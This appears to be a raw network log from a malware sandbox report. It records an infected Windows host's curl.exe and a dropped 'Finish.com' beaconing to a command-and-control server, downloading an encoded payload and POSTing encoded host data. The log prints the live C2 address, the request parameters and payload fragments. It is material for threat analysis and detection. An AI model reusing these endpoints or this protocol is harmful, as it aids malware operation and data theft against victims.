                                      Data Ascii: W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.549879178.215.224.74806604C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:26.022053003 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:27.335227013 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:27 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.549883178.215.224.74806976C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:27.643054008 CET105OUTGET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:29.005273104 CET328INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:28 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Content-Length: 104
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 55 6d 56 32 5a 32 5a 33 5a 55 52 74 64 47 74 72 5a 58 45 73 5a 33 70 6e 4b 46 4a 6e 66 6d 31 73 64 32 56 47 5a 58 5a 70 59 32 56 7a 4c 47 31 36 5a 53 6f 32 4b 44 4d 71 4b 6d 41 30 4f 44 64 67 4e 57 6f 31 4d 7a 59 7a 4e 6d 41 30 4d 44 63 31 4e 6d 59 30 4d 6d 45 78 5a 6d 63 39 4f 6d 59 34 4f 7a 73 37 49 6a 41 3d
                                      Data Ascii: UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.549887178.215.224.74806160C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:29.312491894 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:30.639029026 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:30 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.549893178.215.224.74801848C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:30.973300934 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:32.305784941 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:32 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.549899178.215.224.74805560C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:33.250124931 CET128OUTGET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:34.878098965 CET1236INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:34 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 31 66 33 66 65 63 0d 0a 56 46 5a 78 55 30 6c 44 54 55 46 4a 51 30 4e 4e 51 55 4e 44 51 79 30 74 4f 6b 46 44 52 47 39 44 51 30 46 44 51 55 46 42 51 55 46 52 51 30 6c 44 51 55 46 42 51 30 4e 42 51 55 4e 42 51 55 46 44 51 55 6c 42 51 30 4e 42 51 55 4e 42 51 30 4e 44 51 55 4e 44 51 30 46 42 51 55 4e 4a 51 30 46 42 53 55 4e 44 53 55 46 44 51 30 4d 79 51 30 4e 42 51 30 6b 38 5a 48 64 6e 4e 6b 46 30 51 57 35 4f 53 57 42 76 51 46 52 4e 4d 47 70 55 52 32 68 79 59 33 6c 43 64 57 4e 6c 4f 57 78 68 62 55 5a 32 53 55 56 4d 61 6d 4a 76 4e 33 52 6b 51 30 4a 72 55 6c 46 43 65 57 78 56 4e 6d 39 68 56 54 5a 6c 55 45 63 37 56 45 74 50 4f 58 52 59 52 31 64 31 52 46 45 77 53 30 70 44 53 55 4e 42 51 55 46 44 51 30 46 43 51 47 55 35 52 6e 42 43 57 6e 45 74 54 55 46 56 59 33 5a 34 5a 55 52 48 63 44 6f 32 52 45 64 4a 4f 6b 64 44 57 57 46 2b 65 47 56 46 57 57 74 31 4e 6b 52 41 63 79 39 4e 53 56 31 6a 64 47 70 72 63 45 64 79 4f 44 52 49 62 57 74 55 54 30 46 72 59 33 52 36 5a 32 64 6f 65 56 55 32 51 6b 70 78 4c 55 31 43 4e 6b [TRUNCATED]
                                      Data Ascii: 1f3fecVFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0MyQ0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FCQGU5RnBCWnEtTUFVY3Z4ZURHcDo2REdJOkdDWWF+eGVFWWt1NkRAcy9NSV1jdGprcEdyODRIbWtUT0FrY3R6Z2doeVU2QkpxLU1CNkpJaGVHR3A6NlVtbGhpQ1VhfnhlSUFDQ0NDQ0NBQ05KRENBQE1BUVlBMndCSlR3QUNDQUFDQUFBQzRJQUFDUXNAQ2VDQ2JlQ0NBRllKSUNCQ0lDQUxPQ0NDQ0BDQUNJS0NDQUNBQUVBQUFASUNBQUFBQ0FBREFBQUNCb0FDQ0FVQ0FDQ0NBQ0NDQVBBUklDQUVJQ0Z8Z0BLQ0NlQEFqWUlDR0FDQUVBQUFBQ0lTQUFBU0NBQUNBQUFDRUlBQ0NBQUNBQ0NDQUNDQ05Kc0NJTlFBSUNDSVFDOkNhckdBQ0lJQ0NBQ0FBQUFBakpFUEFHZ21DQUFDb0FjQ1pJa0NDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FDQ0FDRlNBZUNDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFMbFpuZUhRQ0NBQ3diUUFDQUpBQ0NBQndBQ0NDQkNDQ0FBQUNJQ0FBSUNDSUFDQ0NLQ0NBW0s9e1hHRDBZUUFBWWtnQ0FBQ0NDQUFDTEFBQ0FASUNDQUFDQUNDQ0FDQ0NBQUFDSUdBQUlHQ31aRUQyW1NDQUNEcClAZ0NBc0FBQUFDQUNBQUNnQ0FBQ
                                      Nov 24, 2024 12:05:34.878264904 CET1236INData Raw: 30 46 42 51 55 4e 42 53 55 46 44 51 30 46 42 51 30 46 44 51 45 4e 42 51 30 5a 44 54 47 30 31 61 56 46 61 55 6d 68 4a 51 30 4e 4a 52 55 4e 6c 51 30 4e 47 51 30 68 44 53 55 6c 44 51 30 46 44 51 55 46 42 51 55 46 42 51 30 6c 44 51 55 46 42 51 30 4e
                                      Data Ascii: 0FBQUNBSUFDQ0FBQ0FDQENBQ0ZDTG01aVFaUmhJQ0NJRUNlQ0NGQ0hDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDZ0lBQ3VDNXtjMUhoQUNDQ2NwRUNJQ0JBTHVDSWtlQ0NDSUNBQ0lJQ0NBQ0FBQUFBQUNJQ0FFQUNDRUF3Y21WcWI6TUNDRElSQUNDQzRDOkNBQkFDSUNBNklTQ0lBQ0NDQ0NDQUNJSUNDQUBBQUFCQ0FD
                                      Nov 24, 2024 12:05:34.878369093 CET1236INData Raw: 6d 4e 56 55 6a 73 7a 52 6c 49 36 56 6d 39 42 51 6b 4e 44 55 44 73 78 52 6c 41 76 56 47 63 79 55 47 31 43 52 47 77 37 4e 45 45 72 54 32 4a 32 4c 79 30 76 50 45 34 70 56 56 41 35 4d 6c 70 6b 4f 7a 42 4f 55 6a 70 55 56 45 6c 43 51 30 6c 4c 62 45 5a
                                      Data Ascii: mNVUjszRlI6Vm9BQkNDUDsxRlAvVGcyUG1CRGw7NEErT2J2Ly0vPE4pVVA5MlpkOzBOUjpUVElCQ0lLbEZOS1pJZERVTmRTenFDXm5KUGVTUUFBQUF4MlBtQ0FBQ0NQOFRVSUJDQVg5MFVGZi1GVFFDUUNGLWRSU05GVGlBWUNAUC87WG1LQ2VBQ0FkREZJM0Y1RkJxLzBiQ3JVWUNULzhUbklKQ0FYOTNGRmYtMXQ7M0ZSLVZq
                                      Nov 24, 2024 12:05:34.878408909 CET1236INData Raw: 31 46 70 51 30 39 30 62 57 6b 77 57 6e 42 31 51 6e 64 47 51 6d 52 44 64 6c 4a 31 51 55 5a 50 51 55 59 79 55 45 52 45 62 7a 31 6c 52 30 6c 42 52 6a 45 74 4c 53 30 37 4c 32 5a 4f 58 6c 4d 30 54 47 51 76 4c 79 38 72 52 6e 64 4b 58 55 64 52 52 57 4a
                                      Data Ascii: 1FpQ090bWkwWnB1QndGQmRDdlJ1QUZPQUYyUEREbz1lR0lBRjEtLS07L2ZOXlM0TGQvLy8rRndKXUdRRWJwQDBpTnpvdnVLMEdGZENRT0FKU3RBU1VxclVZQ2llRC9GY1F8UmVAbU9KV0FDWDAzcEszR0FQOFZVS05DQUZCbUNnUUNBUDkySkpqLURZaUFRQ0FEOWxvV004Qmd/ZWdBfVItJy8xLXA7W3ZFSElbTkZkdXRSd0Jx
                                      Nov 24, 2024 12:05:34.878443956 CET1236INData Raw: 6c 70 47 4a 31 5a 76 61 30 4e 6f 4d 6b 4e 42 4e 45 77 78 54 30 4e 42 51 46 70 58 56 6b 35 58 4e 6b 5a 4d 4f 79 38 76 4c 33 4a 6b 51 6d 39 44 51 55 5a 51 62 54 56 59 4d 79 30 74 4d 55 4a 74 57 55 73 37 51 30 46 4e 5a 57 56 55 51 55 46 44 58 31 52
                                      Data Ascii: lpGJ1Zva0NoMkNBNEwxT0NBQFpXVk5XNkZMOy8vL3JkQm9DQUZQbTVYMy0tMUJtWUs7Q0FNZWVUQUFDX1RsVCcxWl02TVM2Q0NGcFdKZ0NDRFJKNkt6OS8tI044RlptVkk5Q0FPajpTf0FDVVZtRi9lRC1BeFIwUmxiLU5beUFZQ0Z4SmptQ0NFZXdoOElDNE56TEFBQlovMVAyL3hWQ2VrQUM2UTBjQUlDTnVqbGYzSlduaXV7
                                      Nov 24, 2024 12:05:34.878484964 CET1236INData Raw: 32 70 6a 51 6a 4a 45 52 32 70 54 4f 45 31 42 51 32 4e 31 55 48 4a 68 4c 54 45 74 4c 33 68 75 5a 6a 4e 49 55 57 78 65 64 32 6c 7a 57 31 4e 44 53 57 68 68 51 44 4a 4b 5a 44 73 78 51 55 35 71 62 55 39 73 54 30 46 42 52 32 70 52 4f 45 64 4a 51 32 46
                                      Data Ascii: 2pjQjJER2pTOE1BQ2N1UHJhLTEtL3huZjNIUWxed2lzW1NDSWhhQDJKZDsxQU5qbU9sT0FBR2pROEdJQ2F1VG1PRFlDQUZkbWNBeENDT3NMVjBqT2pHQ0N4MFg6SVNBQUlNakBTU0NDVWduSi1+Jy1XK2gwK3YvL2ktS0xSUWhTVDJnR0lBQUNWfjhUYUlCQ0FLWkNkQVFOUlFnNXBsWXBSaGlRZEFQVTRHUEpDSUk1dTNTT2c4
                                      Nov 24, 2024 12:05:34.878520012 CET1236INData Raw: 55 45 6e 64 54 41 34 54 47 6c 68 51 32 73 74 61 6c 64 55 4f 6d 46 50 61 32 74 44 51 54 5a 4e 62 45 64 42 51 30 74 47 65 45 46 35 52 6d 52 6c 52 43 31 6b 55 57 46 47 5a 6d 31 55 4c 57 5a 42 4b 30 78 53 5a 30 42 54 56 54 4e 47 4c 57 52 6d 61 69 31
                                      Data Ascii: UEndTA4TGlhQ2staldUOmFPa2tDQTZNbEdBQ0tGeEF5RmRlRC1kUWFGZm1ULWZBK0xSZ0BTVTNGLWRmai1OVUNBWUNGJ2RkaC1EYHtBU0lJNSl3KU4yaFFBQUtYLS9uVVZjdWxVNk85TkFJRC1mY3hVNkNYR0FDRnBDR3J3XndqY1t1Q0lWb2tHa2lDQTRPMUVDQUBaV1dnUUFBSUNWdWhkU0FBQzZlejcvJzlWNEJENi8tKU44
                                      Nov 24, 2024 12:05:34.878555059 CET108INData Raw: 6b 31 34 4c 53 74 7a 56 6b 38 34 64 44 4a 34 55 58 5a 4b 62 32 5a 6d 4e 32 6b 74 63 48 42 43 64 6c 4a 73 4e 6e 64 4d 56 69 63 7a 5a 6e 42 5a 65 6b 74 4a 51 55 56 74 51 44 52 4f 64 44 45 74 4a 7a 46 7a 51 32 78 76 54 43 74 50 61 57 49 35 5a 43 63
                                      Data Ascii: k14LStzVk84dDJ4UXZKb2ZmN2ktcHBCdlJsNndMViczZnBZektJQUVtQDROdDEtJzFzQ2xvTCtPaWI5ZCctVUZkVS14Vktna0FDNmxMOi0vK
                                      Nov 24, 2024 12:05:34.878593922 CET1236INData Raw: 30 35 53 5a 6e 74 4f 55 47 46 42 64 56 46 42 51 54 56 2f 4d 56 4a 6c 57 30 5a 30 50 32 52 44 63 30 35 53 65 48 52 45 5a 6d 35 64 4e 53 6b 7a 56 32 6b 76 4d 31 68 6a 59 56 4a 62 53 46 46 42 52 47 31 31 56 55 31 44 51 55 5a 73 57 47 46 4b 51 55 4e
                                      Data Ascii: 05SZntOUGFBdVFBQTV/MVJlW0Z0P2RDc05SeHREZm5dNSkzV2kvM1hjYVJbSFFBRG11VU1DQUZsWGFKQUNLQUJzNkRSbUZHaUNBRkRyWmQzLyc2UkBCRGcpe05AQUNOam1DMEdBQUtIQXNHSUNnOEFHV0ZmbTlFQUNBQ0hDcUVBQ1ZtUkNCREZySnc4Q0lGdkxsQXE/KzFXU2NMQUpTSUxtYFVPQUFGbnAxLXotLzQxSkBGQlU2
                                      Nov 24, 2024 12:05:34.878609896 CET1236INData Raw: 32 52 73 52 6e 64 44 51 55 30 34 62 6d 39 35 64 45 51 74 4c 33 70 51 53 46 4e 5a 64 6e 55 32 54 55 52 37 4c 79 63 72 54 69 6c 45 62 47 59 7a 53 6c 4e 4f 59 55 35 72 53 46 46 42 52 47 31 4d 52 30 56 42 53 55 52 75 55 46 5a 6f 62 6d 59 32 53 6c 64
                                      Data Ascii: 2RsRndDQU04bm95dEQtL3pQSFNZdnU2TUR7LycrTilEbGYzSlNOYU5rSFFBRG1MR0VBSURuUFZobmY2SldMLXBeR2VrQ0E2VGtQQUNMLUZZQ0FTQURyTGc4Q0FOUG1tZkwtLzBtemktRm1tUEwtJzBvaWE7aGdqLU4tLTBtVmsnYm1qdk4vLzJqUThHSUNhdXptaUMwQ0FBKzFCJzkzNlBmW0c6Q2h4MGt1c0V3Q11DKzNKdGRR
                                      Nov 24, 2024 12:05:34.998260975 CET1236INData Raw: 6c 4a 57 63 30 4e 45 54 46 6f 76 65 6c 63 32 5a 31 56 42 51 32 46 58 56 55 6c 48 4f 6b 39 59 61 45 68 44 51 30 4e 44 52 69 39 6d 62 6d 49 74 5a 6c 46 6f 62 30 68 45 4f 45 46 42 53 33 35 31 54 79 39 4f 4d 6c 4a 5a 62 47 59 76 52 47 78 6d 4d 30 42
                                      Data Ascii: lJWc0NETFovelc2Z1VBQ2FXVUlHOk9YaEhDQ0NDRi9mbmItZlFob0hEOEFBS351Ty9OMlJZbGYvRGxmM0BRWi0zWGE2TGB0Ly0tLTFvWENsR0xIWmR1SkFDQ0M0eG5vQ0RKQ0NHaEFzRUFBYUNJdVJ3Qm1AQ0FDQVA5MzlYL1VlOFFXNnp0LWRkanM5K2phQ2VBQV4tOzkrRWpbajJDQTRYMDtDQUFEeEF3NVhnSVJoVE1PQ0FE


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.549915178.215.224.74803772C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:40.454709053 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:41.692329884 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:41 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.549920178.215.224.74803876C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:42.619935989 CET93OUTGET /v10/ukyh.php?gi HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:43.955971003 CET211INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:43 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 11
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                      Data Ascii: 8.46.123.75


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.549925178.215.224.74806064C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:44.626692057 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:45.929018974 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:45 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.549930178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:46.246402979 CET541OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 247
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 59 57 52 6d 62 57 78 7a 58 45 4e 77 63 6b 5a 6a 64 47 4e 65 54 6d 39 6a 59 57 35 55 56 6d 56 74 65 46 34 31 50 6a 67 79 4d 54 42 65 52 47 74 75 61 33 74 67 4c 47 46 76 62 31 74 41 58 55 4d 36 58 46 64 37 5a 33 4a 7a 58 47 4e 75 5a 6d 39 73 63 31 78 42 63 6e 42 4d 59 58 5a 6a 58 45 78 74 59 32 4e 75 58 6c 52 6e 62 33 4a 63 4e 7a 59 36 4f 44 45 79 58 45 35 72 62 47 46 7a 61 69 78 68 62 57 38 25 33 44
                                      Data Ascii: jspo=43&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeYWRmbWxzXENwckZjdGNeTm9jYW5UVmVteF41PjgyMTBeRGtua3tgLGFvb1tAXUM6XFd7Z3JzXGNuZm9sc1xBcnBMYXZjXExtY2NuXlRnb3JcNzY6ODEyXE5rbGFzaixhbW8%3D
                                      Nov 24, 2024 12:05:47.596132040 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:47 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192.168.2.549934178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:47.851183891 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:49.114867926 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:48 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192.168.2.549939178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:49.459774971 CET134OUTGET /v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:50.818061113 CET240INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:50 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 40
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 4d 53 70 53 5a 33 35 6e 62 6e 56 74 52 6d 64 2b 61 57 46 6e 63 53 78 6e 65 6d 56 43 53 47 35 6a 62 6e 4e 6e 51 44 45 3d
                                      Data Ascii: MSpSZ35nbnVtRmd+aWFncSxnemVCSG5jbnNnQDE=


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192.168.2.549944178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:51.052460909 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:52.362545967 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:52 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      27192.168.2.549947178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:52.670052052 CET140OUTGET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:53.976739883 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:53 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      28192.168.2.549957178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:56.294596910 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:57.614417076 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:57 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      29192.168.2.549964178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:05:59.524944067 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:00.794481039 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:00 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 4e 33 78 32 62 57 46 6d
                                      Data Ascii: N3x2bWFm


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      30192.168.2.549970178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:01.304518938 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:02.564130068 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:02 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      31192.168.2.549971178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:01.309434891 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:02.575341940 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:02 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.549976178.215.224.74805544C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:03.063842058 CET815OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 521
                                      Cache-Control: no-cache
